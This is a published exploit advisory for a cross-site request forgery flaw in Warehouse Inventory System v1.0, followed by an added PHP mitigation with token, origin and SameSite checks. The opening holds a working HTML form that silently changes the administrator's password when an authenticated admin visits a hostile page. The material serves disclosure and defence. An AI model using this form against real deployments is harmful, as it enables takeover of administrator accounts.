## https://sploitus.com/exploit?id=PACKETSTORM:158815
# Exploit Title: Warehouse Inventory System - Cross-Site Request Forgery (CSRF) - Change Admin Password  
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)  
# Date: August 9th, 2020  
# Vendor Homepage: https://oswapp.com  
# Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip  
# Version: 1.0  
# Tested On: Windows 10 Pro + XAMPP | Python 2.7  
# CWE-352: Cross-Site Request Forgery (CSRF)  
# CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6  
# Vulnerability Description:  
# Cross-Site Request Forgery (CSRF) vulnerability in the 'edit_user.php' page of OSWAPP's  
# Warehouse Inventory System v1.0 allows remote attackers to change the admin's password  
# when an authenticated admin visits a third-party site.  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST">  
<input type="hidden" name="password" value="Boku123!" />  
<input type="hidden" name="update-pass" value="" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>
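
From the defender's side, the missing control is any proof that the password-change POST originated from the application's own page. Below is an added example of a synchronizer-token check for a handler like the page's edit_user.php; it is not code from the original advisory or from the warehouse-inventory-system project. The function names, the `csrf_token` and `current_password` field names, and the `verify_current_password()` helper are assumptions for illustration; the `update-pass` and `password` field names come from the PoC above. It assumes PHP 7.3 or later for the array form of `session_set_cookie_params()`.

```php
<?php
// Added example (not from the advisory or the project): CSRF protection for a
// password-change handler. Field and function names below are assumptions.

// SameSite=Lax on the session cookie stops browsers from attaching the session to
// a top-level cross-site POST such as the auto-submitted form in the PoC.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one unguessable token per session and reuse it in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session's token in constant time.
function csrf_token_is_valid($submitted): bool {
    if (!isset($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: a form posted from another site carries that site's Origin
// (or Referer). Reject state-changing requests whose origin host is not ours,
// and fail closed when neither header is present.
function origin_is_same_site(): bool {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? null;
    if ($origin === null) {
        return false;
    }
    $host = parse_url($origin, PHP_URL_HOST);
    return is_string($host) && $host === ($_SERVER['SERVER_NAME'] ?? '');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update-pass'])) {
    if (!origin_is_same_site() || !csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid request.');
    }
    // Re-authenticate before rotating a credential so that a riding session alone
    // is not enough (verify_current_password() is a hypothetical helper).
    if (!verify_current_password((int)($_GET['id'] ?? 0), $_POST['current_password'] ?? '')) {
        http_response_code(403);
        exit('Current password incorrect.');
    }
    // ... proceed with the password update for the authenticated user ...
}
?>
<!-- The token is embedded in the legitimate form; an attacker's page cannot read it. -->
<form action="edit_user.php?id=1" method="POST">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="password" name="current_password">
  <input type="password" name="password">
  <button type="submit" name="update-pass" value="1">Update password</button>
</form>
```

Each of the three layers blocks the PoC on its own: the attacker's page cannot read the session-bound token, its POST arrives with a foreign Origin, and a Lax session cookie is not sent with the cross-site submission at all. The Origin check should stay secondary to the token, since Referer can be suppressed by a strict Referrer-Policy and failing closed there would reject some legitimate clients.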